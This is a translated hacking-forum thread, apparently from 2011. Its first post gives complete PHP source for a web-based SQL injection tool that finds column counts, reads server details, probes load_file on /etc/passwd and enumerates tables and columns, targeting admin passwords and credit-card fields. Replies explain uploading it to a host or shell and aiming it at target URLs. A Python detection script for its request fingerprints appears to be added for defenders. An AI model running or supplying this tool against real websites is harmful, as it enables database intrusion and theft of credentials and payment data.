[PHP] SQL Injector Web Based

A place for discussion and tutorials on using tools for hacking, security and computer forensics.

Moderators: Paman, Xshadow, indounderground

Forum rules
Tools uploaded by members are not checked by us and may be infected with malware, intentionally or not; we recommend downloading such tools from their author's own source. Anyone creating a thread is expected to include a screenshot of the tool.

Postby shad.hckr » Tue Oct 25, 2011 11:15 pm

[PHP] SQL Injector Web Based

Originally coded by : [email protected]
Modified by : Xblack

Source code : http://xblack.biz/code.php?id=19

Code:
<html>
<head><title>SQL Injector - Web Version</title>
<style type="text/css">
body{
    background-color: #000;
    font-family: courier new;
    font-size:11px;
    color:#FFFFFF;
}
input,textarea{
    font-family: courier new;
    font-size:11px;
    color:#FFFFFF;
    background-color: #999999;
    border:1px solid #000000;
}
#form {
    text-align:center;
    background-color:#222;
    padding:5px;
}
#error {
    text-align:center;
    background-color:#cc0000;
    padding:5px;
}
</style>
</head>
<body>

<h3>SQL Injector - Web Version - Darkc0de - Xblack</h3>
<form action="" method="POST">
<div id="form">Url : <input type="text" name="url" size="70"> End : <input type="text" name="end" size="3"><br>
<input type="submit" value="inject"><br><br>
Created by : darkc0de | Modified into web version by <a href="http://xblack.biz">Xblack</a> &copy; 2011</div>
</form>
<pre><?php
set_time_limit(0);
if(isset($_POST['url'])) {
    if(empty($_POST['end'])) {
        $end = "--";
    } else {
        $end = $_POST['end'];
    }   
    injector($_POST['url'],$end);
}

function injector($url,$end) {
        if(!preg_match("/darkc0de/", $url)) {
            print "<div id='error'>[?] Example: http://site.com/index.php?id=darkc0de&pg=news</div>\n";
        } else {
       
        switch($end) {
            case '--' :
            $end = '--';
            break;
            case '/*' :
            $end = '/*';
            break;
            default:
            $end = '--';
            break;
        }
       
        print "[-] URL : $url\n";
        print "[%] Trying connect to host...\n";
        if(con_host($url))
        {
            print "[+] Connect to host successful\n";
            print Get_Info($url);
            print "[-] Finding column number...\n";
            print "[-] Testing : ";
            inject_get_column_num($url, $end);
           
        } else {
            print "[!] Connect to host failed\n";
        }}
}
function inject_get_column_num($url, $end) {

    $max = 100;
    $stop = 0;
   
    $rurl = $url;
   
    for($i = 0; $i <= $max; $i++) {
    $word .= "concat(0x6461726B63306465,0x3a,".str_repeat($i,1).",0x3a),";
    $sql = str_replace("darkc0de", "1+AND+1=2+UNION+ALL+SELECT+".rtrim($word,",")."+$ending", $url);
    print "$i,";
    if(preg_match("/darkc0de:([0-9]+):/i", con_host($sql), $val)) {
        print "\n[+] Found column number: ".$i."\n";
        print "[+] Null Number: ".$val[1]."\n";
        save_log('injector.txt', "[-] Found column number: ".$i."\r\n");
        save_log('injector.txt', "[-] Null Number: ".$val[1]."\r\n");
       
        for($a = 0; $a <= $i; $a++) {
        $col .= "$a,";
         if($a == $val[1]) {
             $col = str_replace($val[1], "darkc0de", $col);
         }
        }
        $real = str_replace("darkc0de", "1+AND+1=2+UNION+ALL+SELECT+".rtrim($col,",")."+$ending", $rurl);
        print "[+] URL: ".$real."\n";
        save_log('injector.txt', "[+] URL: ".$real."\r\n");
        sql_info($real);
    }
  }
}
function sql_info($url) {
   
    $table_4 = array(
    'tbladmins','sort','_wfspro_admin','4images_users','a_admin','account','accounts','adm','admin','admin_login','admin_user','admin_userinfo','administer','administrable','administrate','administration','administrator','administrators','adminrights','admins','adminuser','art','article_admin','articles','artikel','密� ?','aut','author','autore','backend','backend_users','backenduser','bbs','book','chat_config','chat_messages','chat_users','client','clients','clubconfig','company','config','contact','contacts','content','control','cpg_config','cpg132_users','customer','customers','customers_basket','dbadmins','dealer','dealers','diary','download','Dragon_users','e107.e107_user','e107_user','forum.ibf_members','fusion_user_groups','fusion_users','group','groups','ibf_admin_sessions','ibf_conf_settings','ibf_members','ibf_members_converge','ibf_sessions','icq','images','index','info','ipb.ibf_members','ipb_sessions','joomla_users','jos_blastchatc_users','jos_comprofiler_members','jos_contact_details','jos_joomblog_users','jos_messages_cfg','jos_moschat_users','jos_users','knews_lostpass','korisnici','kpro_adminlogs','kpro_user','links','login','login_admin','login_admins','login_user','login_users','logins','logon','logs','lost_pass','lost_passwords','lostpass','lostpasswords','m_admin','main','mambo_session','mambo_users','manage','manager','mb_users','member','memberlist','members','minibbtable_users','mitglieder','movie','movies','mybb_users','mysql','mysql.user','name','names','news','news_lostpass','newsletter','nuke_authors','nuke_bbconfig','nuke_config','nuke_popsettings','nuke_users','用户','obb_profiles','order','orders','parol','partner','partners','passes','password','passwords','perdorues','perdoruesit','phorum_session','phorum_user','phorum_users','phpads_clients','phpads_config','phpbb_users','phpBB2.forum_users','phpBB2.phpbb_users','phpmyadmin.pma_table_info','pma_table_info','poll_user','punbb_users','pwd','pwds','reg_user','reg_users','registered','regu
ser','regusers','session','sessions','settings','shop.cards','shop.orders','site_login','site_logins','sitelogin','sitelogins','sites','smallnuke_members','smf_members','SS_orders','statistics','superuser','sysadmin','sysadmins','system','sysuser','sysusers','table','tables','tb_admin','tb_administrator','tb_login','tb_member','tb_members','tb_user','tb_username','tb_usernames','tb_users','tbl','tbl_user','tbl_users','tbluser','tbl_clients','tbl_client','tblclients','tblclient','test','usebb_members','user','user_admin','user_info','user_list','user_login','user_logins','user_names','usercontrol','userinfo','userlist','userlogins','username','usernames','userrights','users','vb_user','vbulletin_session','vbulletin_user','voodoo_members','webadmin','webadmins','webmaster','webmasters','webuser','webusers','x_admin','xar_roles','xoops_bannerclient','xoops_users','yabb_settings','yabbse_settings','ACT_INFO','ActiveDataFeed','Category','CategoryGroup','ChicksPass','ClickTrack','Country','CountryCodes1','CustomNav','DataFeedPerformance1','DataFeedPerformance2','DataFeedPerformance2_incoming','DataFeedShowtag1','DataFeedShowtag2','DataFeedShowtag2_incoming','dtproperties','Event','Event_backup','Event_Category','EventRedirect','Events_new','Genre','JamPass','MyTicketek','MyTicketekArchive','News','PerfPassword','PerfPasswordAllSelected','Promotion','ProxyDataFeedPerformance','ProxyDataFeedShowtag','ProxyPriceInfo','Region','SearchOptions','Series','Sheldonshows','StateList','States','SubCategory','Subjects','Survey','SurveyAnswer','SurveyAnswerOpen','SurveyQuestion','SurveyRespondent','sysconstraints','syssegments','tblRestrictedPasswords','tblRestrictedShows','TimeDiff','Titles','ToPacmail1','ToPacmail2','UserPreferences','uvw_Category','uvw_Pref','uvw_Preferences','Venue','venues','VenuesNew','X_3945','tblArtistCategory','tblArtists','tblConfigs','tblLayouts','tblLogBookAuthor','tblLogBookEntry','tblLogBookImages','tblLogBookImport','tblLogBookUser','tblMails','tblNewCa
tegory','tblNews','tblOrders','tblStoneCategory','tblStones','tblUser','tblWishList','VIEW1','viewLogBookEntry','viewStoneArtist','vwListAllAvailable','CC_info','CC_username','cms_user','cms_users','cms_admin','cms_admins','user_name','jos_user','table_user','email','mail','bulletin','cc_info','login_name','admuserinfo','userlistuser_list','SiteLogin','Site_Login','UserAdmin','Admins','Login','Logins'
    );
   
    $column_4 = array(
'user','username','password','passwd','pass','cc_number','id','email','emri','fjalekalimi','pwd','user_name','customers_email_address','customers_password','user_password','name','user_pass','admin_user','admin_password','admin_pass','usern','user_n','users','login','logins','login_user','login_admin','login_username','user_username','user_login','auid','apwd','adminid','admin_id','adminuser','adminuserid','admin_userid','adminusername','admin_username','adminname','admin_name','usr','usr_n','usrname','usr_name','usrpass','usr_pass','usrnam','nc','uid','userid','user_id','myusername','mail','emni','logohu','punonjes','kpro_user','wp_users','emniplote','perdoruesi','perdorimi','punetoret','logini','llogaria','fjalekalimin','kodi','emer','ime','korisnik','korisnici','user1','administrator','administrator_name','mem_login','login_password','login_pass','login_passwd','login_pwd','sifra','lozinka','psw','pass1word','pass_word','passw','pass_w','user_passwd','userpass','userpassword','userpwd','user_pwd','useradmin','user_admin','mypassword','passwrd','admin_pwd','admin_passwd','mem_password','memlogin','e_mail','usrn','u_name','uname','mempassword','mem_pass','mem_passwd','mem_pwd','p_word','pword','p_assword','myname','my_username','my_name','my_password','my_email','cvvnumber','about','access','accnt','accnts','account','accounts','admin','adminemail','adminlogin','adminmail','admins','aid','aim','auth','authenticate','authentication','blog','cc_expires','cc_owner','cc_type','cfg','cid','clientname','clientpassword','clientusername','conf','config','contact','converge_pass_hash','converge_pass_salt','crack','customer','customers','cvvnumber]','data','db_database_name','db_hostname','db_password','db_username','download','e-mail','emailaddress','full','gid','group','group_name','hash','hashsalt','homepage','icq','icq_number','id_group','id_member','images','index','ip_address','last_ip','last_login','lastname','log','login_name','login_pw','loginkey','loginout','logo',
'md5hash','member','member_id','member_login_key','member_name','memberid','membername','members','new','news','nick','number','nummer','pass_hash','passwordsalt','passwort','personal_key','phone','privacy','pw','pwrd','salt','search','secretanswer','secretquestion','serial','session_member_id','session_member_login_key','sesskey','setting','sid','spacer','status','store','store1','store2','store3','store4','table_prefix','temp_pass','temp_password','temppass','temppasword','text','un','user_email','user_icq','user_ip','user_level','user_passw','user_pw','user_pword','user_pwrd','user_un','user_uname','user_usernm','user_usernun','user_usrnm','userip','userlogin','usernm','userpw','usr2','usrnm','usrs','warez','xar_name','xar_pass'
);
   
    print "[-] Getting sql server information...\n";
    $info = array(
    'User' => 'user()',
    'Database' => 'database()',
    'Version' => 'version()'
    );
   
    $rurl = $url;
    $rurl2 = $url;
    $rurl3 = $url;
   
    $ending = '--';
   
    foreach($info as $get => $val) {
        if(preg_match("/darkc0de:(.*?):darkc0de/", con_host("".str_replace("darkc0de", "".$string."+concat(0x6461726B63306465,0x3a,$val,0x3a,0x6461726B63306465)+", $url).""), $value)) {
            print "[-] $get: $value[1]\n";
            save_log('injector.txt', "[-] $get: $value[1]\r\n");
        }}
        print "[-] Testing load file...\n";
    $load = str_replace("darkc0de", "".$string."load_file(0x2f6574632f706173737764)", $rurl);
    if(preg_match("/root:x:/", con_host($load))) {
        print "[-] w00t w00t, you have permission to load file!\n";
        print "[-] URL: $load\n";
        save_log('injector.txt', "[-] w00t w00t, you have permission to load file!\r\n");
        save_log('injector.txt', "[-] URL: $load\r\n");
    } else {
        print "[-] No permission to load file :( \n";
    }
            if(preg_match("/darkc0de:5.(.*?):darkc0de/", con_host("".str_replace("darkc0de", "concat(0x6461726B63306465,0x3a,version(),0x3a,0x6461726B63306465)", $url).""), $value)) {
                print "[-] MySQL Server version is : 5.x\n";
                print "[-] Start extract the column and table...\n";
                print "[-] Table : Column\n";
                $url = str_replace("darkc0de", "concat(char(88,98,108,97,99,107,58),count(table_name),char(58,88,98,108,97,99,107))", $url);
                //$url = str_replace($ending, "+from+information_schema.tables+where+table_schema=database()+$ending", $url);
                $url = "$url+from+information_schema.tables+where+table_schema=database()$ending";
                if(preg_match("/Xblack:([0-9]+):Xblack/", con_host($url), $totaltbl)) {
                   print "[+] Total Table Found: ".$totaltbl[1]."\n";
                   save_log('injector.txt', "[+] Total Table Found: ".$totaltbl[1]."\r\n");
                   for($i = 0; $i <= $totaltbl[1]; $i++) {
                  $urlxx = str_replace("darkc0de","concat(char(88,98,108,97,99,107,58),table_name,char(58,88,98,108,97,99,107))",$rurl2);
                  $urlxx = $urlxx."from+information_schema.tables+where+table_schema=database()+limit+".$i.",1+$ending";
                  if(preg_match("/Xblack:(.*?):Xblack/", con_host($urlxx), $table_name)) {
                      print "[-] Table: ".$table_name[1]."\n";
                      save_log('injector.txt', "[-] Table: ".$table_name[1]."\r\n");
                    $urlxxx = str_replace("darkc0de","concat(char(88,98,108,97,99,107,58),count(column_name),char(58,88,98,108,97,99,107))",$rurl2);
                    $urlxxx = $urlxxx."from+information_schema.columns+where+table_name=0x".HexValue($table_name[1])."+$ending";
                      if(preg_match("/Xblack:(.*?):Xblack/", con_host($urlxxx), $totalclm)) {
                          print "[+] Total Column in ".$table_name[1].": ".$totalclm[1]."\n";
                          save_log('injector.txt', "[+] Total Column in ".$table_name[1].": ".$totalclm[1]."\r\n");
                          for($a = 0; $a <= $totalclm[1]; $a++) {
                            $urlxxxx = str_replace("darkc0de","concat(char(88,98,108,97,99,107,58),column_name,char(58,88,98,108,97,99,107))",$rurl3);
                            $urlxxxx = $urlxxxx."from+information_schema.columns+where+table_name=0x".HexValue($table_name[1])."+limit+".$a.",1+$ending";
                              if(preg_match("/Xblack:(.*?):Xblack/", con_host($urlxxxx), $column_name)) {
                                  print "".$column_name[1].",";
                                  save_log('injector.txt', "".$column_name[1].",");
                             }
                          }
                          print "\n";
                          save_log('injector.txt', "\r\n");
                      }
                  }
                   }
                   
                }

            } else {
                print "[-] MySQL Server version is : 4.x\n";
                print "[-] Start automatic column and table finder...\n";
                print "[-] This may take a few minutes or hours to finish\n";
                foreach($table_4 as $table) {
                    $i++;
                    $url = str_replace("concat(0x696E6A336374)", "concat(0x6461726B63306465)", $rurl);
                    $url = str_replace($ending, "+from+".$table."+$ending", $url);
                    if(preg_match("/darkc0de/", con_host($url))) {
                        print "[$i] Found Table : $table\n";
                        save_log('injector.txt', "[-] Found Table : $table\r\n");
                        print "[-] Finding column...\n";
                         foreach($column_4 as $column) {
                             $url = str_replace("darkc0de", "concat(0x6461726B63306465,0x3a,$column,0x3a,0x6461726B63306465)", $rurl);
                            $url = str_replace("$ending", "+from+".$table."+$ending", $url);
                            if(preg_match("/darkc0de:(.*?):darkc0de/", con_host($url))) {
                                print "[-] Found column: $column\n";
                                save_log('injector.txt', "[-] Found column: $column\r\n");
                            }
                         }
                         save_log('injector.txt', "\r\n");
                         print "[-] Done searching column inside $table table\n";
                       
                    }
                }
            }
    print "[-] Done\n";
    print "[-] See 'injector.txt' to see the log\n";
    exit;
}
function HexValue($text) {
     for($i = 0; $i < strlen($text); $i++) {
         $a .= dechex(ord($text[$i]));
     }
     return $a;
}
function Get_Info($site) {
    if($info = con_host($site)) {
        preg_match("/Content-Type:(.+)/", $info, $type);
        preg_match("/Server:(.+)/", $info, $server);
        print "[-] $type[0]\n";
        print "[-] $server[0]\n";
        $ip = parse_url($site);
        print "[-] IP: ".gethostbyname($ip['host'])."\n";
    }
}
function con_host($host) {
    $ch = curl_init($host);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_TIMEOUT, 200);
    curl_setopt($ch, CURLOPT_HEADER, 1);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
    curl_setopt($ch, CURLOPT_COOKIEFILE, "google_cookies.txt");
    curl_setopt($ch, CURLOPT_COOKIEJAR, "google_cookies.txt");
    curl_setopt($ch, CURLOPT_REFERER, "http://google.com");
    curl_setopt($ch, CURLOPT_USERAGENT, 'Opera/9.80 (J2ME/MIDP; Opera Mini/9.80 (S60; SymbOS; Opera Mobi/23.348; U; en) Presto/2.5.25 Version/10.54');
   
    $pg = curl_exec($ch);
    if($pg){
        return $pg;
    } else {
        return false;
    }
}
function save_log($fname = '', $text = '') {
    $file = @fopen(dirname(__FILE__).'/'.$fname.'', 'a');
    $write = @fwrite($file, $text, '60000000');
    if($write) {
        return 1;
    } else {
        return 0;
    }
}?>
</body>
</html>
shad.hckr
 
Posts: 555
Joined: Mon Sep 29, 2008 4:48 am
Location: /home/sh4dhckr
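
For defenders: the requests this script sends carry fixed fingerprints (the hex marker `0x6461726B63306465`, the `char(88,98,108,97,99,107,58)` marker, the `load_file` probe, and the hard-coded User-Agent and Referer in `con_host()`), so they can be picked out of web server access logs. The following is an added example, not part of the original post; the log lines are constructed, and the `/index.php` endpoint, the IP addresses and the names `scan`, `severity` and `log_line` are assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Apache/nginx "combined" access-log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<target>\S+) [^"]*" '
    r'\d{3} \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$')

# Fingerprints taken from the posted source (markers, keywords, fixed headers).
SIGNATURES = {
    "marker_darkc0de_hex": re.compile(r"0x6461726b63306465", re.I),
    "marker_xblack_char": re.compile(r"char\(88,98,108,97,99,107,58\)", re.I),
    "union_all_select": re.compile(r"\bunion\s+all\s+select\b", re.I),
    "information_schema": re.compile(r"information_schema\.(?:tables|columns)", re.I),
    "load_file_etc_passwd": re.compile(r"load_file\(0x2f6574632f706173737764\)", re.I),
}
TOOL_UA = ("Opera/9.80 (J2ME/MIDP; Opera Mini/9.80 (S60; SymbOS; "
           "Opera Mobi/23.348; U; en) Presto/2.5.25 Version/10.54")
TOOL_REFERER = "http://google.com"

def scan(lines):
    """Group signature hits by client IP; unparseable lines are skipped."""
    report = defaultdict(lambda: {"hits": set(), "requests": 0, "max_columns": 0})
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m:
            continue
        target = unquote_plus(m["target"])  # '+' and %xx decode to the raw SQL text
        hits = {name for name, rx in SIGNATURES.items() if rx.search(target)}
        if m["ua"] == TOOL_UA and m["referer"] == TOOL_REFERER:
            hits.add("tool_http_headers")
        if hits:
            entry = report[m["ip"]]
            entry["hits"] |= hits
            entry["requests"] += 1
            # The column-count sweep adds one marker-wrapped column per probe.
            cols = len(SIGNATURES["marker_darkc0de_hex"].findall(target))
            entry["max_columns"] = max(entry["max_columns"], cols)
    return dict(report)

def severity(hits):
    if hits & {"information_schema", "load_file_etc_passwd"}:
        return "high"    # schema enumeration or a file read was attempted
    if hits - {"tool_http_headers"}:
        return "medium"  # injection probes only
    return "low"         # header fingerprint without a payload

# Constructed sample data (documentation IP ranges, hypothetical endpoint).
def log_line(ip, target, referer=TOOL_REFERER, ua=TOOL_UA):
    return (f'{ip} - - [25/Oct/2011:23:20:01 +0700] "GET {target} HTTP/1.1" '
            f'200 5120 "{referer}" "{ua}"')

P = "/index.php?id=1+AND+1=2+UNION+ALL+SELECT+"
M = "concat(0x6461726B63306465,0x3a,{},0x3a)"
SAMPLE_LOG = [
    log_line("198.51.100.7", "/index.php?id=12&pg=news", "-", "Mozilla/5.0"),
    log_line("192.0.2.44", P + M.format(0) + "+&pg=news"),
    log_line("192.0.2.44", P + M.format(0) + "," + M.format(1) + "+&pg=news"),
    log_line("192.0.2.44", P + "0,concat(char(88,98,108,97,99,107,58),table_name,"
             "char(58,88,98,108,97,99,107))+from+information_schema.tables+limit+0,1"),
    log_line("192.0.2.44", P + "0,load_file(0x2f6574632f706173737764)+&pg=news"),
]
```

A match on `tool_http_headers` alone is weak evidence because the header values are trivially changed; treat the payload markers as the stronger signal and `max_columns` as a rough measure of how far the column-count sweep progressed.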

Re: [PHP] SQL Injector Web Based

Postby NoThee » Wed Oct 26, 2011 12:23 am

Bro, I want to ask how to use that code, what do I do with it? I'm confused; I often see PHP code like that but don't know what to do with it...?
Please answer... sorry, newbie
NoThee
 
Posts: 9
Joined: Sun Sep 18, 2011 1:12 am

Re: [PHP] SQL Injector Web Based

Postby shad.hckr » Wed Oct 26, 2011 12:39 am

1. Save the code above with a php extension (e.g. sqli.php)
2. Upload it to a web/shell
3. Open it in a browser.
4. Enter the link you want to inject (e.g. http://domain.com/file.php?var=darkc0de)
shad.hckr
 
Posts: 555
Joined: Mon Sep 29, 2008 4:48 am
Location: /home/sh4dhckr

Re: [PHP] SQL Injector Web Based

Postby NoThee » Wed Oct 26, 2011 12:49 am

How do I upload it to a web/shell...?
NoThee
 
Posts: 9
Joined: Sun Sep 18, 2011 1:12 am

Re: [PHP] SQL Injector Web Based

Postby shad.hckr » Wed Oct 26, 2011 5:07 am

NoThee wrote: How do I upload it to a web/shell...?

Look in the other threads, there are lots of tutorials.
shad.hckr
 
Posts: 555
Joined: Mon Sep 29, 2008 4:48 am
Location: /home/sh4dhckr

Re: [PHP] SQL Injector Web Based

Postby poni » Wed Oct 26, 2011 5:20 am

Cool, Mr. shad
.::...Cr3ditz......::....
join us : www.xcode.or.id - 001101
"@ b3tt3r d1g1t4l w0rlD" -- 010110000110001001
poni
 
Posts: 1666
Joined: Mon Dec 05, 2005 10:44 am
Location: Indonesia

Re: [PHP] SQL Injector Web Based

Postby Digital Cat » Wed Oct 26, 2011 7:29 am

Top notch..

Permission to copy the code, OK..

:D If anyone has already uploaded it..

share the link, OK..

In PW right now, PW - Posisi wenak (a comfy position).
Digital Cat
 
Posts: 437
Joined: Fri Jun 26, 2009 6:13 pm
Location: USA

Re: [PHP] SQL Injector Web Based

Postby yuanryuzaki » Fri Nov 11, 2011 1:38 am

I've tried it, bro... and it uploaded to the web successfully :D
yuanryuzaki
 
Posts: 9
Joined: Thu Nov 10, 2011 4:45 pm

Re: [PHP] SQL Injector Web Based

Postby oramelu2 » Mon Jan 02, 2012 11:06 pm

Can it be run, and does it work as it should, bro?
oramelu2
 
Posts: 3
Joined: Mon Jan 02, 2012 10:52 pm

Re: [PHP] SQL Injector Web Based

Postby googlegirl » Thu Jan 05, 2012 8:15 am

Sorry, brothers.. I'm new to this... how do I use this SQL, and where can I download SQL injection??
googlegirl
 
Posts: 4
Joined: Thu Jan 05, 2012 7:33 am
